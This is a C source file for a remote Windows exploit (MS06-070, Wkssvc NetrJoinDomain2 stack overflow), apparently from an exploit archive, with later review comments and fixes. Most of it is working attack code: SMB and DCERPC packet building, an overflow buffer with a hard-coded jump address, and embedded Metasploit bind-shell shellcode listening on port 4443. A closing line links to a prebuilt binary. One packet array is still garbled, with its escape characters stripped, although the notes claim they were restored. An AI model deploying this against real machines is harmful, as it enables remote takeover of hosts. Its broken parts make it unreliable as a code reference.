
MS Windows Wkssvc NetrJoinDomain2 Stack Overflow


/***************************************************************************

Microsoft Windows Wkssvc NetrJoinDomain2 Stack Overflow(MS06-070) Exploit

by cocoruder(frankruder_at_hotmail.com),2006.11.15
page: http://ruder.cdut.net/default.asp

Code fixed by S A Stevens - 17.11.2006 - changed shellcode, Changed code to
correct jmp EBX address and fixed exploit output status.

Should work on Windows 2000 Server SP4 (All Languages)


usage:
ms06070 targetip DomainName

notice:
Make sure the DomainName is valid and live. For more information see
http://research.eeye.com/html/advisories/published/AD20061114.html
cocoruder researched the vulnerability and provides this exploit for
Windows 2000 only.
****************************************************************************/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#include <winsock.h>
#include <tchar.h>
#pragma comment(lib, "wsock32.lib")


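/*
 * SMB_COM_NEGOTIATE request (command 0x72) with its 4-byte NetBIOS session
 * header in front (length 0x2f = 47 bytes of SMB payload). The only dialect
 * offered is "NT LM 0.12".
 *
 * NOTE(review): the forum stripped every backslash from the listing
 * ("x00x00..."), which would compile to literal ASCII text of the wrong
 * length. The \x escapes are restored here so the array holds the intended
 * 51 bytes.
 */
unsigned char SmbNeg[] =
"\x00\x00\x00\x2f\xff\x53\x4d\x42\x72\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x88\x05\x00\x00\x00\x00\x00\x0c\x00\x02\x4e\x54"
"\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00";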


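/*
 * SMB_COM_SESSION_SETUP_ANDX request (command 0x73), 72 bytes of SMB payload
 * behind the NetBIOS header. The AccountName and PrimaryDomain fields are
 * empty (an anonymous/null session); NativeOS is "nt" and NativeLanMan is
 * "pysmb". The UID assigned by the server is read from the reply by main().
 *
 * NOTE(review): backslashes restored after the forum stripped them from
 * the original listing.
 */
unsigned char Session_Setup_AndX_Request[]=
"\x00\x00\x00\x48\xff\x53\x4d\x42\x73\x00"
"\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\xff\xff\x88\x05\x00\x00\x00\x00\x0d\xff\x00\x00\x00\xff"
"\xff\x02\x00\x88\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x01\x00\x00\x00\x0b\x00\x00\x00\x6e\x74\x00\x70\x79\x73\x6d"
"\x62\x00";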


unsigned char TreeConnect_AndX_Request[]=
"x00x00x00x58xffx53x4dx42x75x00"
"x00x00x00x18x07xc8x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00xffxfex00x08x00x03x04xffx00x58x00x08"
"x00x01x00x2dx00x00x5cx00x5cx00x31x00x37x00x32x00"
"x2ex00x32x00x32x00x2ex00x35x00x2ex00x34x00x36x00"
"x5cx00x49x00x50x00x43x00x24x00x00x00x3fx3fx3fx3f"
"x3fx00";


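/*
 * SMB_COM_NT_CREATE_ANDX request (command 0xa2), 100 bytes of SMB payload,
 * opening the named pipe "\wkssvc" (UTF-16 at the end of the packet).
 * main() patches UID (0x20) and TID (0x1c) before sending and reads the
 * returned FID from the reply.
 *
 * NOTE(review): backslashes restored after the forum stripped them from
 * the original listing.
 */
unsigned char NTCreate_AndX_Request[]=
"\x00\x00\x00\x64\xff\x53\x4d\x42\xa2\x00"
"\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x08\x04\x0c\x00\x08\x00\x01\x18\xff\x00\xde\xde\x00"
"\x0e\x00\x16\x00\x00\x00\x00\x00\x00\x00\x9f\x01\x02\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x01\x00"
"\x00\x00\x40\x00\x40\x00\x02\x00\x00\x00\x01\x11\x00\x00\x5c\x00"
"\x77\x00\x6b\x00\x73\x00\x73\x00\x76\x00\x63\x00\x00\x00";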


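/*
 * SMB_COM_TRANSACTION (command 0x25) carrying a DCERPC bind (ptype 0x0b) to
 * the wkssvc interface, sent over the "\PIPE\" transact-named-pipe function
 * (setup word 0x26 at offset 0x41, FID placeholder at 0x43). The bind names
 * abstract syntax 6bffd098-a112-3610-9833-46c3f87e345a v1.0 (wkssvc) and
 * transfer syntax 8a885d04-1ceb-11c9-9fe8-08002b104860 v2 (NDR).
 * main() patches UID (0x20), TID (0x1c), FID (0x43) and the NetBIOS length.
 *
 * NOTE(review): backslashes restored after the forum stripped them from
 * the original listing.
 */
unsigned char Rpc_Bind_Wkssvc[]=
"\x00\x00\x00\x92\xff\x53\x4d\x42\x25\x00"
"\x00\x00\x00\x18\x01\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x01\x08\xf0\x0b\x03\x08\xf7\x4c\x10\x00\x00\x48\x00\x00"
"\x04\xe0\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4a"
"\x00\x48\x00\x4a\x00\x02\x00\x26\x00\x01\x40\x4f\x00\x5c\x50\x49"
"\x50\x45\x5c\x00\x05\x00\x0b\x03\x10\x00\x00\x00\x48\x00\x00\x00"
"\x00\x00\x00\x00\xd0\x16\xd0\x16\x00\x00\x00\x00\x01\x00\x00\x00"
"\x00\x00\x01\x00\x98\xd0\xff\x6b\x12\xa1\x10\x36\x98\x33\x46\xc3"
"\xf8\x7e\x34\x5a\x01\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11"
"\x9f\xe8\x08\x00\x2b\x10\x48\x60\x02\x00\x00\x00";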


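/*
 * Fixed prefix of the NetrJoinDomain2 request: an SMB_COM_TRANSACTION
 * (command 0x25) over "\PIPE\" wrapping a DCERPC request (ptype 0) for
 * opnum 22, followed by the first stub arguments.
 *
 * Offsets patched at runtime (see main() and MakeAttackPacket()):
 *   0x00  NetBIOS length           0x1c TID        0x20 UID
 *   0x27  TotalDataCount           0x3b DataCount  0x43 FID
 *   0x45  ByteCount                0x60 DCERPC frag length (PDU starts at 0x58)
 *   len-12, len-4  MaxCount / ActualCount of the DomainNameParam string
 *
 * After the opnum the stub holds a referent id, then ServerName as a
 * conformant/varying UTF-16 string "\\172.22.5.41" (14 chars including the
 * NUL), then the MaxCount / Offset / ActualCount triple for DomainNameParam,
 * whose body is appended by MakeAttackPacket. The 0x54 / 0x110 values are
 * placeholders that get overwritten.
 *
 * NOTE(review): the ServerName is the original author's lab address, not the
 * target; whether the service cares is not established by this listing.
 * Backslashes restored after the forum stripped them from the listing.
 */
unsigned char Rpc_NetrJoinDomain2_Header[]=
"\x00\x00\x00\xa8\xff\x53\x4d\x42\x25\x00"
"\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x08\x6c\x07\x00\x08\xc0\x01\x10\x00\x00\x54\x00\x00"
"\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54"
"\x00\x54\x00\x54\x00\x02\x00\x26\x00\x00\x40\x65\x00\x00\x5c\x00"
"\x50\x00\x49\x00\x50\x00\x45\x00\x5c\x00\x00\x00\x00\x00\x05\x00"
"\x00\x03\x10\x00\x00\x00\x54\x00\x00\x00\x01\x00\x00\x00\x3c\x00"
"\x00\x00\x00\x00"
"\x16\x00"                 /* opnum 22: NetrJoinDomain2 */
"\x30\x2a\x42\x00"         /* referent id for ServerName */
"\x0e\x00\x00\x00"         /* ServerName MaxCount (wide chars) */
"\x00\x00\x00\x00"         /* ServerName Offset */
"\x0e\x00\x00\x00"         /* ServerName ActualCount */
"\x5c\x00\x5c\x00\x31\x00\x37\x00\x32\x00"
"\x2e\x00\x32\x00\x32\x00\x2e\x00\x35\x00\x2e\x00\x34\x00\x31\x00"
"\x00\x00"
"\x10\x01\x00\x00"         /* DomainNameParam MaxCount, patched to len/2 */
"\x00\x00\x00\x00"         /* DomainNameParam Offset */
"\x10\x01\x00\x00";        /* DomainNameParam ActualCount, patched to len/2 */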


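/*
 * Trailing NetrJoinDomain2 stub arguments appended after the DomainNameParam
 * body: three zero DWORDs followed by 0x00000001. The zero DWORDs are most
 * plausibly null pointers for the remaining string/credential arguments and
 * the final value the Options flags - presumed from the call's shape, not
 * established by this listing.
 *
 * NOTE(review): backslashes restored after the forum stripped them from
 * the original listing.
 */
unsigned char Rpc_NetrJoinDomain2_End[]=
"\x00\x00\x00\x00"
"\x00\x00\x00\x00"
"\x00\x00\x00\x00"
"\x01\x00\x00\x00";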


/* UTF-16 copy of the DomainName argument, built by MakeAttackPacket(). */
unsigned char *lpDomainName = NULL;
/* Size of that buffer in bytes. */
DWORD dwDomainNameLen = 0;



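/*
 * win32_bind - EXITFUNC=seh LPORT=4443 Size=344 Encoder=PexFnstenvSub
 * http://metasploit.com
 *
 * Metasploit bind-shell payload that, per its header, listens on TCP 4443
 * after successful exploitation (main() prints that port). The first bytes
 * are the PexFnstenvSub decoder stub; the payload proper is XOR-encoded.
 *
 * NOTE(review): this is opaque third-party machine code taken from a forum
 * post. Disassemble and verify it before running it anywhere; do not trust
 * the comment alone.
 *
 * Backslashes restored after the forum stripped them from the listing; the
 * array holds 344 bytes, matching the Size in the header above.
 */
unsigned char shellcode[] =
"\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe9"
"\x59\x23\xce\x83\xeb\xfc\xe2\xf4\x15\x33\xc8\x83\x01\xa0\xdc\x31"
"\x16\x39\xa8\xa2\xcd\x7d\xa8\x8b\xd5\xd2\x5f\xcb\x91\x58\xcc\x45"
"\xa6\x41\xa8\x91\xc9\x58\xc8\x87\x62\x6d\xa8\xcf\x07\x68\xe3\x57"
"\x45\xdd\xe3\xba\xee\x98\xe9\xc3\xe8\x9b\xc8\x3a\xd2\x0d\x07\xe6"
"\x9c\xbc\xa8\x91\xcd\x58\xc8\xa8\x62\x55\x68\x45\xb6\x45\x22\x25"
"\xea\x75\xa8\x47\x85\x7d\x3f\xaf\x2a\x68\xf8\xaa\x62\x1a\x13\x45"
"\xa9\x55\xa8\xbe\xf5\xf4\xa8\x8e\xe1\x07\x4b\x40\xa7\x57\xcf\x9e"
"\x16\x8f\x45\x9d\x8f\x31\x10\xfc\x81\x2e\x50\xfc\xb6\x0d\xdc\x1e"
"\x81\x92\xce\x32\xd2\x09\xdc\x18\xb6\xd0\xc6\xa8\x68\xb4\x2b\xcc"
"\xbc\x33\x21\x31\x39\x31\xfa\xc7\x1c\xf4\x74\x31\x3f\x0a\x70\x9d"
"\xba\x0a\x60\x9d\xaa\x0a\xdc\x1e\x8f\x31\x32\x95\x8f\x0a\xaa\x2f"
"\x7c\x31\x87\xd4\x99\x9e\x74\x31\x3f\x33\x33\x9f\xbc\xa6\xf3\xa6"
"\x4d\xf4\x0d\x27\xbe\xa6\xf5\x9d\xbc\xa6\xf3\xa6\x0c\x10\xa5\x87"
"\xbe\xa6\xf5\x9e\xbd\x0d\x76\x31\x39\xca\x4b\x29\x90\x9f\x5a\x99"
"\x16\x8f\x76\x31\x39\x3f\x49\xaa\x8f\x31\x40\xa3\x60\xbc\x49\x9e"
"\xb0\x70\xef\x47\x0e\x33\x67\x47\x0b\x68\xe3\x3d\x43\xa7\x61\xe3"
"\x17\x1b\x0f\x5d\x64\x23\x1b\x65\x42\xf2\x4b\xbc\x17\xea\x35\x31"
"\x9c\x1d\xdc\x18\xb2\x0e\x71\x9f\xb8\x08\x49\xcf\xb8\x08\x76\x9f"
"\x16\x89\x4b\x63\x30\x5c\xed\x9d\x16\x8f\x49\x31\x16\x6e\xdc\x1e"
"\x62\x0e\xdf\x4d\x2d\x3d\xdc\x18\xbb\xa6\xf3\xa6\x19\xd3\x27\x91"
"\xba\xa6\xf5\x31\x39\x59\x23\xce";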


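/*
 * Payload layout parameters used by MakeAttackPacket().
 *
 * addr_jmp_ebx is a hard-coded gadget address inside ntdll.dll of Windows
 * 2000 Server SP4 (the only target the header claims). It is written into
 * the request right after the jump stub and, going by the exploit's title,
 * presumably lands on the saved return address - any other service pack or
 * build needs its own "jmp ebx" address. Nothing here detects a wrong
 * target; a bad address simply crashes the service.
 */
DWORD fill_len_1 = 0x84c;        /* 0x90 filler between the domain name and the jump stub */
DWORD fill_len_2 = 0x1000;       /* 0x41 filler appended after the shellcode */
DWORD addr_jmp_ebx = 0x77F92A9B; /* "jmp ebx" in ntdll.dll, Windows 2000 SP4 */

/*
 * Jump stub placed directly before addr_jmp_ebx. EB 06 is a short forward
 * jump of 6 bytes: it hops over the two NOPs and the 4-byte address that
 * follow, landing on the first shellcode byte. (The original listing called
 * this "jmp 8"; the encoded displacement is 6.)
 *
 * NOTE(review): backslashes restored after the forum stripped them from
 * the listing.
 */
unsigned char code_jmp8[] =
"\xEB\x06\x90\x90";

/* Assembled NetrJoinDomain2 request and its byte length; set by MakeAttackPacket(). */
unsigned char *Rpc_NetrJoinDomain2 = NULL;
DWORD dwRpc_NetrJoinDomain2 = 0;

/* Reply buffer shared by every recv() in main(); field offsets are read from it. */
unsigned char recvbuff[2048];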


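/*
 * Print the banner and usage text to stdout.
 *
 * The forum stripped the backslashes from the newline escapes ("Exploitn");
 * they are restored here. The dates in these strings (2006.10.15 and
 * 16.11.2006) differ from the file header (2006.11.15 / 17.11.2006); the
 * text is kept as posted rather than guessing which one is right.
 *
 * NOTE(review): main() as posted never calls this function, so the usage
 * text is only shown if a caller adds the call.
 */
void showinfo(void)
{
    printf("Microsoft Windows Wkssvc NetrJoinDomain2 Stack Overflow(MS06-070) Exploit\n");
    printf("by cocoruder(frankruder_at_hotmail.com),2006.10.15\n");
    printf("page:http://ruder.cdut.net/default.asp\n\n");
    printf("Code fixed by S A Stevens - 16.11.2006\n");
    printf("Should work on Windows 2000 Server SP4 (All Languages)\n\n");
    printf("usage:\n");
    printf("ms06070 targetip DomainName\n\n");
    printf("notice:\n");
    printf("Make sure the DomainName is valid and live,more informations see\n");
    printf("http://research.eeye.com/html/advisories/published/AD20061114.html,\n");
    printf("cocoruder just research the vulnerability and give the exploit for Win2000.\n\n\n");
}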

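/*
 * Send the SMB_COM_NEGOTIATE request (SmbNeg) on socket s.
 *
 * The reply is not read here; the caller drains it with recv() before the
 * session setup. The original declared and zeroed a 1 KiB 'response' buffer
 * it never used - that dead buffer is gone. A failed send() is reported on
 * stdout, in the style of the other send calls in this file, but the
 * function stays void for the existing caller.
 */
void neg(int s)
{
    if (send(s, (const char *)SmbNeg, sizeof(SmbNeg) - 1, 0) <= 0) {
        printf("send SmbNeg error!\n");
    }
}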



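/*
 * Build the NetrJoinDomain2 request for lpDomainNameStr into the globals
 * Rpc_NetrJoinDomain2 (malloc'd; the caller owns and frees it) and
 * dwRpc_NetrJoinDomain2 (its length in bytes). The NetBIOS/transaction
 * length fields and UID/TID/FID are left for main() to patch.
 *
 * The DomainNameParam string body is laid out as:
 *   domain name as UTF-16, with two L'\\' written over its NUL and the
 *   spare slot                                  (dwDomainNameLen bytes)
 *   0x90 filler                                 (fill_len_1 - 6 bytes)
 *   code_jmp8: EB 06 90 90, a short jmp over the next 4 bytes
 *   addr_jmp_ebx                                (4 bytes, host byte order)
 *   shellcode                                   (sizeof(shellcode) - 1 bytes)
 *   0x41 filler                                 (fill_len_2 bytes)
 *   UTF-16 NUL terminator, plus one pad byte if the total would be odd
 * followed by Rpc_NetrJoinDomain2_End. The MaxCount and ActualCount of the
 * string (12 and 4 bytes before the end of Rpc_NetrJoinDomain2_Header) are
 * patched in place to the body length in wide characters.
 *
 * Fixes over the posted version: the malloc of lpDomainName is checked; the
 * MultiByteToWideChar size argument is given in WCHARs (it is a count of
 * wide characters, not bytes - the old byte count overstated the buffer);
 * its result is checked; the temporary wide-string buffer is released
 * instead of leaked; the DWORD stores no longer go through unaligned
 * pointer casts. On any failure a message is printed and
 * Rpc_NetrJoinDomain2 is left NULL, so callers must test it before use.
 */
void MakeAttackPacket(char *lpDomainNameStr)
{
    const DWORD hdr_len  = (DWORD)(sizeof(Rpc_NetrJoinDomain2_Header) - 1);
    const DWORD end_len  = (DWORD)(sizeof(Rpc_NetrJoinDomain2_End) - 1);
    const DWORD stub_len = (DWORD)(sizeof(code_jmp8) - 1);
    const DWORD addr_len = (DWORD)sizeof(addr_jmp_ebx);
    const DWORD sc_len   = (DWORD)(sizeof(shellcode) - 1);
    DWORD len, half, pad;
    unsigned char *p;
    int wchars;

    Rpc_NetrJoinDomain2 = NULL;
    dwRpc_NetrJoinDomain2 = 0;

    if (lpDomainNameStr == NULL || lpDomainNameStr[0] == '\0') {
        printf("DomainName must not be empty!\n");
        return;
    }

    /* name + NUL + one spare slot, all as 2-byte wide characters */
    dwDomainNameLen = (DWORD)((strlen(lpDomainNameStr) + 2) * 2);
    lpDomainName = (unsigned char *)malloc(dwDomainNameLen);
    if (lpDomainName == NULL) {
        printf("malloc error!\n");
        return;
    }
    memset(lpDomainName, 0, dwDomainNameLen);

    /* cchWideChar counts WCHARs; the buffer holds dwDomainNameLen/2 of them */
    wchars = MultiByteToWideChar(CP_ACP, 0, lpDomainNameStr, -1,
                                 (LPWSTR)lpDomainName,
                                 (int)(dwDomainNameLen / sizeof(WCHAR)));
    if (wchars == 0) {
        printf("MultiByteToWideChar error!\n");
        goto fail;
    }

    /*
     * Turn the wide NUL and the spare slot into two L'\\'. Only the low
     * byte is written; the high byte is still 0 from the memset above.
     */
    lpDomainName[dwDomainNameLen - 2] = 0x5C;
    lpDomainName[dwDomainNameLen - 4] = 0x5C;

    len = dwDomainNameLen
        + (fill_len_1 - 3 * 2)
        + stub_len
        + addr_len
        + sc_len
        + fill_len_2
        + 2;                          /* UTF-16 NUL terminator */

    /* a wide string needs an even byte length; pad with one extra NUL byte */
    pad = len % 2;
    len += pad;
    half = len / 2;                   /* length in wide characters */

    dwRpc_NetrJoinDomain2 = hdr_len + len + end_len;
    Rpc_NetrJoinDomain2 = (unsigned char *)malloc(dwRpc_NetrJoinDomain2);
    if (Rpc_NetrJoinDomain2 == NULL) {
        printf("malloc error!\n");
        dwRpc_NetrJoinDomain2 = 0;
        goto fail;
    }
    /* default fill is 0x90; the fill_len_1 region is left as-is below */
    memset(Rpc_NetrJoinDomain2, 0x90, dwRpc_NetrJoinDomain2);

    /* MaxCount and ActualCount of DomainNameParam, in wide characters */
    memcpy(Rpc_NetrJoinDomain2_Header + hdr_len - 0x0c, &half, sizeof half);
    memcpy(Rpc_NetrJoinDomain2_Header + hdr_len - 0x04, &half, sizeof half);

    p = Rpc_NetrJoinDomain2;
    memcpy(p, Rpc_NetrJoinDomain2_Header, hdr_len);  p += hdr_len;
    memcpy(p, lpDomainName, dwDomainNameLen);        p += dwDomainNameLen;
    p += fill_len_1 - 3 * 2;                         /* 0x90 filler from the memset */
    memcpy(p, code_jmp8, stub_len);                  p += stub_len;
    memcpy(p, &addr_jmp_ebx, addr_len);              p += addr_len;
    memcpy(p, shellcode, sc_len);                    p += sc_len;
    memset(p, 0x41, fill_len_2);                     p += fill_len_2;
    memset(p, 0x00, 2 + pad);                        p += 2 + pad;
    memcpy(p, Rpc_NetrJoinDomain2_End, end_len);

    /* the wide copy of the name is only needed inside the packet */
    free(lpDomainName);
    lpDomainName = NULL;
    return;

fail:
    free(lpDomainName);
    lpDomainName = NULL;
}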



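/* Little-endian 16/32-bit field access without unaligned pointer casts. */
static WORD rd16(const unsigned char *p)
{
    WORD v;
    memcpy(&v, p, sizeof v);
    return v;
}

static void wr16(unsigned char *p, WORD v)
{
    memcpy(p, &v, sizeof v);
}

static void wr32(unsigned char *p, DWORD v)
{
    memcpy(p, &v, sizeof v);
}

/*
 * Send one request and read its reply into recvbuff.
 *
 * Returns the reply length, or -1 after printing a message when the send
 * fails, the peer closes the connection, or the reply is shorter than
 * 'need' bytes - so the caller's fixed-offset field reads (UID, TID, FID)
 * never look past the data actually received.
 */
static int smb_exchange(SOCKET s, const unsigned char *req, size_t reqlen,
                        size_t need, const char *what)
{
    int n;

    if (send(s, (const char *)req, (int)reqlen, 0) <= 0) {
        printf("send %s error!\n", what);
        return -1;
    }
    n = recv(s, (char *)recvbuff, sizeof(recvbuff), 0);
    if (n <= 0 || (size_t)n < need) {
        printf("short or missing reply to %s (%d bytes)\n", what, n);
        return -1;
    }
    return n;
}

/*
 * Entry point: ms06070 targetip DomainName
 *
 * Walks the SMB session up to the wkssvc pipe (negotiate, anonymous session
 * setup, tree connect to IPC$, open "\wkssvc", DCERPC bind) and then sends
 * the NetrJoinDomain2 request built by MakeAttackPacket(). UID, TID and FID
 * are read from the replies and patched into each following request.
 *
 * Fixes over the posted version: argc is checked before argv[1]/argv[2] are
 * dereferenced; socket() is compared with INVALID_SOCKET (SOCKET is
 * unsigned, so the old "<= 0" test never fired); WSAStartup, inet_addr and
 * every recv() are checked, and a reply must be long enough to contain the
 * field read from it; a NULL packet from MakeAttackPacket is detected
 * instead of dereferenced; the socket and packet are released on every
 * path; the newline escapes the forum stripped are restored; main returns
 * an exit status.
 *
 * NOTE(review): the SMB status of each reply is still never examined - a
 * rejected session setup or tree connect is only noticed when a later step
 * fails or the final send gets no answer. Port 445 and the 4443 bind port
 * of the shellcode are fixed.
 */
int main(int argc, char **argv)
{
    WSADATA ws;
    struct sockaddr_in server;
    SOCKET sock;
    WORD userid, treeid, fid;
    int rc = 1;

    if (argc != 3) {
        showinfo();
        return 1;
    }

    if (WSAStartup(MAKEWORD(2, 2), &ws) != 0) {
        printf("WSAStartup failed\n");
        return 1;
    }

    memset(&server, 0, sizeof server);
    server.sin_family = AF_INET;
    server.sin_addr.s_addr = inet_addr(argv[1]);
    server.sin_port = htons((USHORT)445);
    if (server.sin_addr.s_addr == INADDR_NONE) {
        printf("invalid target address: %s\n", argv[1]);
        goto out_wsa;
    }

    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock == INVALID_SOCKET) {
        printf("socket() failed\n");
        goto out_wsa;
    }

    printf("[+] Connecting %s\n", argv[1]);
    if (connect(sock, (struct sockaddr *)&server, sizeof(server)) == SOCKET_ERROR) {
        printf("Connection Error, Port 445 Firewalled?\n");
        goto out_sock;
    }

    /* SMB_COM_NEGOTIATE; the reply content is not used, only drained */
    neg(sock);
    if (recv(sock, (char *)recvbuff, sizeof(recvbuff), 0) <= 0) {
        printf("no reply to SMB negotiate\n");
        goto out_sock;
    }

    /* anonymous session setup; UID sits at 0x20 (SMB header offset 28 + 4) */
    if (smb_exchange(sock, Session_Setup_AndX_Request,
                     sizeof(Session_Setup_AndX_Request) - 1, 0x22,
                     "Session_Setup_AndX_Request") < 0) {
        goto out_sock;
    }
    userid = rd16(recvbuff + 0x20);

    /* tree connect to IPC$; TID comes back at 0x1c */
    wr16(TreeConnect_AndX_Request + 0x20, userid);
    if (smb_exchange(sock, TreeConnect_AndX_Request,
                     sizeof(TreeConnect_AndX_Request) - 1, 0x1e,
                     "TreeConnect_AndX_Request") < 0) {
        goto out_sock;
    }
    treeid = rd16(recvbuff + 0x1c);

    /* open the \wkssvc pipe; FID comes back at 0x2a */
    wr16(NTCreate_AndX_Request + 0x20, userid);
    wr16(NTCreate_AndX_Request + 0x1c, treeid);
    if (smb_exchange(sock, NTCreate_AndX_Request,
                     sizeof(NTCreate_AndX_Request) - 1, 0x2c,
                     "NTCreate_AndX_Request") < 0) {
        goto out_sock;
    }
    fid = rd16(recvbuff + 0x2a);

    /* DCERPC bind to wkssvc over the pipe */
    wr16(Rpc_Bind_Wkssvc + 0x20, userid);
    wr16(Rpc_Bind_Wkssvc + 0x1c, treeid);
    wr16(Rpc_Bind_Wkssvc + 0x43, fid);
    wr32(Rpc_Bind_Wkssvc, htonl(sizeof(Rpc_Bind_Wkssvc) - 1 - 4));
    if (smb_exchange(sock, Rpc_Bind_Wkssvc, sizeof(Rpc_Bind_Wkssvc) - 1, 0,
                     "Rpc_Bind_Wkssvc") < 0) {
        goto out_sock;
    }

    /* NetrJoinDomain2 request; the builder leaves the pointer NULL on failure */
    MakeAttackPacket(argv[2]);
    if (Rpc_NetrJoinDomain2 == NULL || dwRpc_NetrJoinDomain2 < 0x62) {
        printf("could not build Rpc_NetrJoinDomain2 request\n");
        goto out_sock;
    }

    wr16(Rpc_NetrJoinDomain2 + 0x20, userid);
    wr16(Rpc_NetrJoinDomain2 + 0x1c, treeid);
    wr16(Rpc_NetrJoinDomain2 + 0x43, fid);
    wr32(Rpc_NetrJoinDomain2, htonl(dwRpc_NetrJoinDomain2 - 4));   /* NetBIOS length */

    wr16(Rpc_NetrJoinDomain2 + 0x27, (WORD)(dwRpc_NetrJoinDomain2 - 0x58)); /* Total Data Count */
    wr16(Rpc_NetrJoinDomain2 + 0x3b, (WORD)(dwRpc_NetrJoinDomain2 - 0x58)); /* Data Count */
    wr16(Rpc_NetrJoinDomain2 + 0x45, (WORD)(dwRpc_NetrJoinDomain2 - 0x47)); /* Byte Count */
    wr16(Rpc_NetrJoinDomain2 + 0x60, (WORD)(dwRpc_NetrJoinDomain2 - 0x58)); /* DCERPC Frag Length */

    if (send(sock, (char *)Rpc_NetrJoinDomain2, (int)dwRpc_NetrJoinDomain2, 0) <= 0) {
        printf("send Rpc_NetrJoinDomain2 error!\n");
        goto out_pkt;
    }

    printf("[+] Sent attack packet successfully, Try telnet on %s:4443?\n", argv[1]);

    /* best effort: a crashed service may never answer */
    recv(sock, (char *)recvbuff, sizeof(recvbuff), 0);
    rc = 0;

out_pkt:
    free(Rpc_NetrJoinDomain2);
    Rpc_NetrJoinDomain2 = NULL;
out_sock:
    closesocket(sock);
out_wsa:
    WSACleanup();
    return rc;
}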

// milw0rm.com [2006-11-17]

A compiled version was also posted:

http://share.urbanfriends.us/savefile_php/uploads/f783ca4bda.rar

(a pre-built binary on a third-party file host; build from the source above rather than running an unverified executable)
